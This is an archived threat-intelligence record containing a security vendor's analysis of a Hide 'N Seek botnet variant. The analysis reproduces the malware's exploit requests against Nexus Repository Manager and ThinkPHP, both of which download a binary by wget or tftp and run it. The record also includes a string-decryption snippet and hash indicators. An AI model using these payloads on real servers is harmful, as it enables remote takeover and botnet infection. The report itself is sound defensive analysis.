{
	"id": "a717e01d-6019-4a8a-954b-5633535ef1fe",
	"created_at": "2026-04-06T00:14:15.919838Z",
	"updated_at": "2026-04-10T03:20:41.885368Z",
	"deleted_at": null,
	"sha1_hash": "89dc48767f8ea1c868b63116ab337d1681f5e1a3",
	"title": "Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager \u0026 ThinkPHP",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 60717,
	"plain_text": "Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus\r\nRepository Manager \u0026 ThinkPHP\r\nBy Ruchna Nigam\r\nPublished: 2019-06-12 · Archived: 2026-04-05 19:15:06 UTC\r\nExecutive Summary\r\nThe Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer\r\ncommunication between bots.\r\nSince its discovery, the malware family has seen a couple of upgrades, from the addition of persistence and new\r\nexploits, to targeting Android devices via the Android Debug Bridge (ADB).\r\nThis post details a variant of the family first seen on the 21st of February 2019, incorporating two new exploits -\r\nCVE-2018-20062 which targets ThinkPHP installations, and CVE-2019-7238, a Remote Code Execution (RCE)\r\nvulnerability in Sonatype Nexus Repository Manager (NXRM) 3 software installations.\r\nWhile the ThinkPHP exploit has already been seen employed by several Mirai variants, the only other instance of\r\nthe CVE-2019-7238 vulnerability being exploited in the wild has been by the DDG botnet. Our research, outlined\r\nbelow, shows that the Hide 'N Seek botnet incorporated this exploit back in February 2019, even before the DDG\r\nbotnet.\r\nTechnical Analysis\r\nThis newest version of the Hide 'N Seek malware incorporates many of the previously seen features of the\r\nmalware family including the persistence, the incorporation of exploits, and targeting Android devices via ADB.\r\nIn addition to exploits previously used by the malware family, this particular version is unique for its use of the\r\nfollowing two new exploits:\r\nCVE-2019-7238, which is a RCE vulnerability in Sonatype Nexus Repository Manager installations prior\r\nto version 3.15.0. While Proof of Concept (PoC) code for this vulnerability has been publicly available\r\nsince a few weeks after its public disclosure, the only other instance of it being exploited in the wild has\r\nbeen by the DDG botnet in May 2019. Our research has shown, based on the first seen date for samples of\r\nthis new Hide 'N Seek version, that the first demonstrated exploitation in the wild was actually February\r\n2019, a full month prior to the DDG botnet. The exploit format is shown below: \r\nPOST /service/extdirect HTTP/1.1\r\nHost: %J\r\nAccept: */*\r\nhttps://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/\r\nPage 1 of 4\n\nContent-Type: application/json\r\nConnection: close\r\nContent-Length: %d\r\n{\"action\":\"coreui_Component\",\"method\":\"previewAssets\",\"data\":[{\"page\":1,\"start\":0,\"limit\":50,\"sort\":\r\n[{\"property\":\"name\",\"direction\":\"ASC\"}],\"filter\":[{\"property\":\"repositoryName\",\"value\":\"*\"},\r\n{\"property\":\"expression\",\"value\":\"233.class.forName(',27h,'java.lang.Runtime',27h,').getRuntime().exec(['flock','-\r\nw','0','/tmp/l%N','sh','-c','(wget http://%J/%T -O %N||/bin/busybox tftp -g -l %N -r %T %I)\u0026\u0026chmod 777\r\n%N\u0026\u0026./%N a%J a%J',27h,'])\"},{\"property\":\"type\",\"value\":\"jexl\"}]}],\"type\":\"rpc\",\"tid\":8}\r\nCVE-2018-20062, is an RCE vulnerability in ThinkPHP. This exploit has frequently been used by Mirai\r\nvariants in the wild since its public disclosure, however this is the first observed use of it by Hide 'N Seek.\r\nThe exploit format is shown below: \r\nGET /?s=/index/thinkapp/invokefunction\u0026function=call_user_func_array\u0026vars[0]=system\u0026vars[1][]=\r\n(wget%20http://%J/%T%20-O%20%N||/bin/busybox%20tftp%20-g%20-l%20%N%20-\r\nr%20%T%20%I);chmod%20777%20%N;./%N%20a%J%20a%J\r\nHTTP/1.1\r\nHost: %J\r\nIn addition, this Hide 'N Seek variant also exploits the following vulnerabilities which it has used in the past:\r\nCVE-2018-7297: a RCE vulnerability in the HomeMatic Zentrale CCU2.\r\nCouchDB RCE\r\nOrientDB RCE\r\nNetgear DGN1000 setup.cgi RCE\r\nAVTECH IP Camera/NVR/DVR RCE\r\nTP-Link Routers backdoor\r\nIn addition to the two new exploits, this new variant also uses an XOR key of 0x87 for string encryption, which is\r\ndifferent from previously seen variants. However, the encryption scheme used is the same as has been used by the\r\nmalware family so far i.e. a cumulative byte-wise XOR. This is better explained by the IDApython code-snippet\r\nbelow:\r\nkey=0x87\r\nfor addr in range(strstart, strend):\r\n     originalbyte = GetOriginalByte(addr)\r\n     decryptedbyte = originalbyte^(key\u00260xff)\r\n     PatchByte(addr, decryptedbyte)\r\nhttps://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/\r\nPage 2 of 4\n\nkey += decryptedbyte\r\nAs seen in previous samples this malware family contains a list of hard-coded peers for P2P communication. The\r\nlist of hard-coded peers in this new variant differs from samples seen in the past. The hard-coded peer IPs and\r\nports in these samples can be found on our Github page here.\r\nConclusion\r\nSince its discovery, the Hide `N Seek P2P Linux botnet has evolved to incorporate several new exploits to widen\r\nthe range of devices it can infect. In this instance, the newly discovered variant added two recent vulnerabilities to\r\nits arsenal. In particular, it added an exploit targeting CVE-2019-7238, which, based on the dates of appearance of\r\nsamples, makes this the earliest exploitation of the vulnerability in the wild.\r\nPalo Alto Networks customers are protected by:\r\nWildFire, which detects all related samples with malicious verdicts\r\nThreat Prevention, which blocks all exploits used by this variant.\r\nThe malware family can be tracked in AutoFocus using the tag HideNSeek.\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report\r\nwith our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections\r\nto their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat\r\nAlliance, visit www.cyberthreatalliance.org.\r\nIndicators of Compromise\r\nFirst\r\nSeen\r\nSHA256\r\nTargeted\r\nArchitecture\r\n2019-\r\n02-21\r\n49495c9aa08d7859fec1f99f487560b59d8a8914811746181e4e7edbee85341f x86 64-bit\r\n2019-\r\n02-21\r\nd068e8f781879774f0bcc1f2a116211d41194b67024fe45966c8272a8038a7a1 ARM\r\n2019-\r\n03-15\r\n1583fd1c6607b77f51411c4ad7c9225324fd1b069645062a348cd885de0ac382\r\n7e20c6cea88ade6a6c4a08ce48fe4ac2451069b7662a8dda4362a304b4854ec7\r\nARM\r\n2019-\r\n03-20\r\n0b05202f4da9bbe1af1811707a76544453282c4f3c0ac9b353759c86742f4369 MIPS big endian\r\n2019-\r\n03-22\r\n73df4e952c581afc427fa18fa2d0bcfa409c1814cd872a3ccf05d44f934ce780\r\nMIPS little\r\nendian\r\nhttps://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/\r\nPage 3 of 4\n\n2019-\r\n05-24\r\nc082c39e595c7f23c04ce0d6597657d6e649585d5da49b5bd896e664b712e60d MIPS big endian\r\n2019-\r\n05-26\r\n500dd4c1a5c24495c3bb8173ce5c7b15ba3344aef855090b9b9585b2bfeea974 x86\r\n Table 1. Sample IOCs for new Hide ‘N Seek variant\r\nSource: https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/\r\nhttps://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp/"
	],
	"report_names": [
		"hide-n-seek-botnet-updates-arsenal-with-exploits-against-nexus-repository-manager-thinkphp"
	],
	"threat_actors": [],
	"ts_created_at": 1775434455,
	"ts_updated_at": 1775791241,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/89dc48767f8ea1c868b63116ab337d1681f5e1a3.pdf",
		"text": "https://archive.orkl.eu/89dc48767f8ea1c868b63116ab337d1681f5e1a3.txt",
		"img": "https://archive.orkl.eu/89dc48767f8ea1c868b63116ab337d1681f5e1a3.jpg"
	}
}